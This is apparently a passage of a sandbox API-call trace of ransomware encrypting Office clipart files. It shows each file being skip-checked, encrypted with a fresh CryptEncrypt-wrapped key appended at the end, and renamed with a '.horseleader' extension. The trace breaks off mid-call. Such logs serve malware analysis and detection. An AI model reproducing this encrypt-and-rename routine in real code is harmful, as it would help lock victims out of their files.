0x0 [0252.798] lstrcmpW (lpString1="AN02559_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.798] lstrcmpW (lpString1="AN02559_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.798] lstrlenW (lpString=".testttjffg") returned 11 [0252.798] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.798] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.798] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 67 [0252.799] StrStrW (lpFirst="AN02559_.WMF", lpSrch=".txt") returned 0x0 [0252.799] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6632) returned 1 [0252.799] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x19e8, lpOverlapped=0x0) returned 1 [0252.835] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe618, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.835] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x19e8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x19e8, lpOverlapped=0x0) returned 1 [0252.835] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.836] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.836] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.836] CloseHandle (hObject=0x158) returned 1 [0252.836] GetProcessHeap () returned 0x780000 [0252.836] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.836] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.horseleader") returned 79 [0252.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.horseleader")) returned 1 [0252.837] GetProcessHeap () returned 0x780000 [0252.837] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.837] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b6bc300, ftCreationTime.dwHighDateTime=0x1bd4c00, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b6bc300, ftLastWriteTime.dwHighDateTime=0x1bd4c00, nFileSizeHigh=0x0, nFileSizeLow=0x83c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN02724_.WMF", cAlternateFileName="")) returned 1 [0252.838] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="Windows") returned -1 [0252.838] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 67 [0252.838] StrStrIW (lpFirst="AN02724_.WMF", lpSrch=".horseleader") returned 0x0 [0252.838] lstrcmpW (lpString1="AN02724_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.838] lstrcmpW (lpString1="AN02724_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.838] lstrlenW (lpString=".testttjffg") returned 11 [0252.838] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.838] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.838] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.840] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 67 [0252.841] StrStrW (lpFirst="AN02724_.WMF", lpSrch=".txt") returned 0x0 [0252.841] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2108) returned 1 [0252.841] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x83c, lpOverlapped=0x0) returned 1 [0252.860] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.860] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x83c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x83c, lpOverlapped=0x0) returned 1 [0252.861] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.861] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.861] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.861] CloseHandle (hObject=0x158) returned 1 [0252.861] GetProcessHeap () returned 0x780000 [0252.861] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.861] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.horseleader") returned 79 [0252.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.horseleader")) returned 1 [0252.862] GetProcessHeap () returned 0x780000 [0252.862] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.862] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c87b100, ftCreationTime.dwHighDateTime=0x1bd4c18, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c87b100, ftLastWriteTime.dwHighDateTime=0x1bd4c18, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN03500_.WMF", cAlternateFileName="")) returned 1 [0252.862] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="Windows") returned -1 [0252.862] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 67 [0252.862] StrStrIW (lpFirst="AN03500_.WMF", lpSrch=".horseleader") returned 0x0 [0252.862] lstrcmpW (lpString1="AN03500_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.862] lstrcmpW (lpString1="AN03500_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.862] lstrlenW (lpString=".testttjffg") returned 11 [0252.862] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.863] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.863] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 67 [0252.864] StrStrW (lpFirst="AN03500_.WMF", lpSrch=".txt") returned 0x0 [0252.864] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9240) returned 1 [0252.864] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2418, lpOverlapped=0x0) returned 1 [0252.913] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdbe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.913] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2418, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2418, lpOverlapped=0x0) returned 1 [0252.914] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.914] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.914] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.914] CloseHandle (hObject=0x158) returned 1 [0252.914] GetProcessHeap () returned 0x780000 [0252.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.914] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.horseleader") returned 79 [0252.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.horseleader")) returned 1 [0252.915] GetProcessHeap () returned 0x780000 [0252.916] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.916] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x928, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04108_.WMF", cAlternateFileName="")) returned 1 [0252.916] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="Windows") returned -1 [0252.916] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 67 [0252.916] StrStrIW (lpFirst="AN04108_.WMF", lpSrch=".horseleader") returned 0x0 [0252.916] lstrcmpW (lpString1="AN04108_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.916] lstrcmpW (lpString1="AN04108_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.916] lstrlenW (lpString=".testttjffg") returned 11 [0252.916] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.916] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.916] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 67 [0252.917] StrStrW (lpFirst="AN04108_.WMF", lpSrch=".txt") returned 0x0 [0252.917] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2344) returned 1 [0252.917] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x928, lpOverlapped=0x0) returned 1 [0252.920] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff6d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.920] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x928, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x928, lpOverlapped=0x0) returned 1 [0252.920] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.920] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.920] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.920] CloseHandle (hObject=0x158) returned 1 [0252.920] GetProcessHeap () returned 0x780000 [0252.920] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.920] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.horseleader") returned 79 [0252.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.horseleader")) returned 1 [0252.922] GetProcessHeap () returned 0x780000 [0252.922] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.922] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x17ac, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04117_.WMF", cAlternateFileName="")) returned 1 [0252.922] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="Windows") returned -1 [0252.922] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 67 [0252.922] StrStrIW (lpFirst="AN04117_.WMF", lpSrch=".horseleader") returned 0x0 [0252.922] lstrcmpW (lpString1="AN04117_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.922] lstrcmpW (lpString1="AN04117_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.922] lstrlenW (lpString=".testttjffg") returned 11 [0252.923] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.923] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.923] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.923] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 67 [0252.924] StrStrW (lpFirst="AN04117_.WMF", lpSrch=".txt") returned 0x0 [0252.924] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6060) returned 1 [0252.924] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x17ac, lpOverlapped=0x0) returned 1 [0252.926] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe854, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.926] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x17ac, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x17ac, lpOverlapped=0x0) returned 1 [0252.926] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.926] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.926] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.926] CloseHandle (hObject=0x158) returned 1 [0252.926] GetProcessHeap () returned 0x780000 [0252.926] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.926] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.horseleader") returned 79 [0252.927] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.horseleader")) returned 1 [0252.927] GetProcessHeap () returned 0x780000 [0252.927] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.927] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04134_.WMF", cAlternateFileName="")) returned 1 [0252.927] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="Windows") returned -1 [0252.927] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 67 [0252.927] StrStrIW (lpFirst="AN04134_.WMF", lpSrch=".horseleader") returned 0x0 [0252.927] lstrcmpW (lpString1="AN04134_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.927] lstrcmpW (lpString1="AN04134_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.927] lstrlenW (lpString=".testttjffg") returned 11 [0252.928] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.928] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.928] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.928] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 67 [0252.928] StrStrW (lpFirst="AN04134_.WMF", lpSrch=".txt") returned 0x0 [0252.928] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3416) returned 1 [0252.928] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd58, lpOverlapped=0x0) returned 1 [0252.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.930] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd58, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd58, lpOverlapped=0x0) returned 1 [0252.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.930] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.930] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 